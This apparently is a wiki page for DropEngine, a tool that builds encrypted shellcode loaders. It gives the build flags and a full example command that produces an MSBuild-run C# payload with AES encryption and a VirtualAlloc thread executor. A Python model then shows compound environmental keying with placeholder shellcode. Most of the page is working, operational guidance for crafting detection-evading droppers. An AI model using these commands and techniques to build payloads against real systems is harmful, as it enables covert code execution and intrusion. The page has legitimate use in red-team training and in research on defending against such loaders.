
II. Building Payloads

Gabriel Ryan edited this page Aug 24, 2020 · 2 revisions

This section describes how to build payloads using DropEngine.

At minimum, we need to run DropEngine with the following flags to generate a payload:

  • Build (--build) - This flag tells DropEngine that we are building a payload
  • Shellcode (--shellcode <path/to/shellcode>) - Passes our raw shellcode to DropEngine by file path.
  • Interface (--interface <interface module name>) - Used to select which Interface module to use. Interface modules are used to coordinate the payload's build process, and are usually specific to the payload's technology stack (e.g. .NET C#, Python, etc).
  • EKeys (--ekeys <list of ekeys here>) - Used to select the ekey module(s) that generate the payload's encryption key. You can specify more than one if you want to use compound keying, where the key is derived from several sources.
  • Crypter (--crypter <name of crypter module>) - Used to select the payload encryption method (e.g. AES or XOR).
  • DKeys (--dkeys <list of dkeys here>) - Used to select one or more dkey modules, which add decryption key derivation functions to your payload. For each ekey you select, you must select the corresponding dkey; the dkey must reproduce at runtime exactly the key material the ekey produced at build time, or the payload will decrypt to garbage.
  • Decrypter (--decrypter <name of decrypter module>) - Used to select a decrypter module, which adds a decryption subroutine to your payload. You must use a decrypter module that corresponds to the crypter module you selected using the --crypter flag.
  • Executor (--executor <name of executor module>) - Used to select an Executor module, which adds an executor subroutine to your payload.
  • Runner (--runner <name of runner module>) - Used to select an outer shell for your payload (e.g. MSBuild)
  • Mutator (--mutator <name of mutator module>) - Used to select a symbol mutation module for your payload (if you don't want to mutate symbols, select mutator_null).

Notice that the Payload Main component is missing from the list of flags above. There's a reason for this -- it's bundled with the Interface so that you don't have to worry about it.

Additionally, you can use the -o flag to write your payload to a file, and the --premodule and --postmodule flags to add subroutines to your payload that execute before or after your shellcode (although we won't cover them in detail here). These flags are all optional.

The following example command shows the actual syntax for generating a payload:

Command:

python dropengine.py --build \
--shellcode shell.bin \
--interface csharp_runner_interface \
--ekeys ekey_static \
--dkeys dkey_csharp_static \
--crypter crypter_aes \
--decrypter decrypter_csharp_rijndael_aes \
--executor executor_csharp_virtual_alloc_thread \
--runner msbuild_csharp_runner \
--mutator mutator_null \
-o example.csproj

Of course, the components you select must be compatible with one another: ekey_static is paired with dkey_csharp_static, and crypter_aes with decrypter_csharp_rijndael_aes, because each payload-side module has to reverse exactly what its build-side counterpart did. Finding compatible modules is covered in the next section, II.-Listing-Modules.
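To make the pairing rule concrete, here is an added Python model of the build-side/payload-side split that the --ekeys/--dkeys and --crypter/--decrypter flags select. It is not DropEngine's code: the SHA-256 keystream XOR "crypter", the ekey_hostname/dkey_hostname pair, the PAIRING table and the placeholder shellcode bytes are all assumptions made for the example (the real tool emits the dkey and decrypter as C# inside the generated payload). It shows compound keying from two ekeys, and that running the payload on the wrong host, or omitting one dkey, silently yields garbage rather than the shellcode.

```python
"""Model of the ekey/dkey and crypter/decrypter pairing that DropEngine's
--ekeys/--dkeys and --crypter/--decrypter flags select. Added example, not
DropEngine's own code: the SHA-256 keystream XOR "crypter" and the module
names below are assumptions standing in for the real modules."""
import hashlib

# ---- build side: what --ekeys and --crypter contribute -----------------------

def ekey_static(seed: bytes) -> bytes:
    """Static key material that the builder bakes into the payload."""
    return seed

def ekey_hostname(expected_hostname: str) -> bytes:
    """Environmental key material: the operator supplies the target's hostname
    at build time; the matching dkey must recover the same value at runtime."""
    return expected_hostname.lower().encode()

def compound_key(parts: list) -> bytes:
    """Compound keying: fold every ekey/dkey output into one 32-byte key.
    Length-prefixing each part keeps (b"ab", b"c") distinct from (b"a", b"bc")."""
    h = hashlib.sha256()
    for part in parts:
        h.update(len(part).to_bytes(4, "big") + part)
    return h.digest()

def keystream(key: bytes, length: int) -> bytes:
    """Expand the key into `length` bytes with a SHA-256 counter (assumed construction)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])

def crypter_xor(data: bytes, key: bytes) -> bytes:
    """Stand-in for a crypter module: XOR the shellcode with the keystream."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

def build(shellcode: bytes, ekey_outputs: list) -> bytes:
    """Build-side half of the pipeline: derive the key, then encrypt the shellcode."""
    return crypter_xor(shellcode, compound_key(ekey_outputs))

# ---- payload side: what --dkeys and --decrypter add to the generated payload --

def dkey_static(seed: bytes) -> bytes:
    """Reverses ekey_static: the seed is embedded in the payload as-is."""
    return seed

def dkey_hostname(runtime_hostname: str) -> bytes:
    """Reverses ekey_hostname using the hostname observed where the payload runs
    (passed in here so the example is deterministic; a real dkey would read it)."""
    return runtime_hostname.lower().encode()

def decrypter_xor(blob: bytes, key: bytes) -> bytes:
    """Stand-in for the matching decrypter module; XOR is its own inverse."""
    return crypter_xor(blob, key)

def payload_recover(blob: bytes, dkey_outputs: list) -> bytes:
    """What the payload does before the executor runs: rebuild the key from its
    dkeys and decrypt. A wrong or missing dkey yields garbage, not an error."""
    return decrypter_xor(blob, compound_key(dkey_outputs))

# ---- pairing check ------------------------------------------------------------

def pairs_match(ekeys: list, dkeys: list, pairing: dict) -> bool:
    """One dkey per ekey, each the counterpart of the ekey in the same position.
    `pairing` maps a build-side module to the payload-side module that reverses it."""
    return len(ekeys) == len(dkeys) and all(pairing.get(e) == d for e, d in zip(ekeys, dkeys))

# Pairs taken from the example command on this page; the table itself is an assumption.
PAIRING = {
    "ekey_static": "dkey_csharp_static",
    "crypter_aes": "decrypter_csharp_rijndael_aes",
}

# Constructed placeholder standing in for shell.bin (nop, nop, int3), not real shellcode.
SHELLCODE = b"\x90\x90\xcc"
SEED = b"example-static-seed"

def demo(runtime_hostname: str = "WORKSTATION-01") -> dict:
    """Build with a static key plus a hostname key, then recover on the given host."""
    blob = build(SHELLCODE, [ekey_static(SEED), ekey_hostname("workstation-01")])
    recovered = payload_recover(blob, [dkey_static(SEED), dkey_hostname(runtime_hostname)])
    return {"encrypted": blob, "recovered": recovered, "ok": recovered == SHELLCODE}

if __name__ == "__main__":
    print(demo()["ok"])                # True on the intended host
    print(demo("other-host")["ok"])    # False: the hostname dkey derives a different key
    print(pairs_match(["ekey_static"], ["dkey_csharp_static"], PAIRING))  # True
```

The point to take from the mismatch cases is that nothing in the decrypt step can tell a wrong key from a right one: the executor would hand the garbage to VirtualAlloc and start a thread on it. That is why DropEngine requires you to pick the dkey and decrypter that correspond to your ekeys and crypter up front, rather than detecting the mismatch at runtime.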

Detailed descriptions of all module types are provided in Module-Types.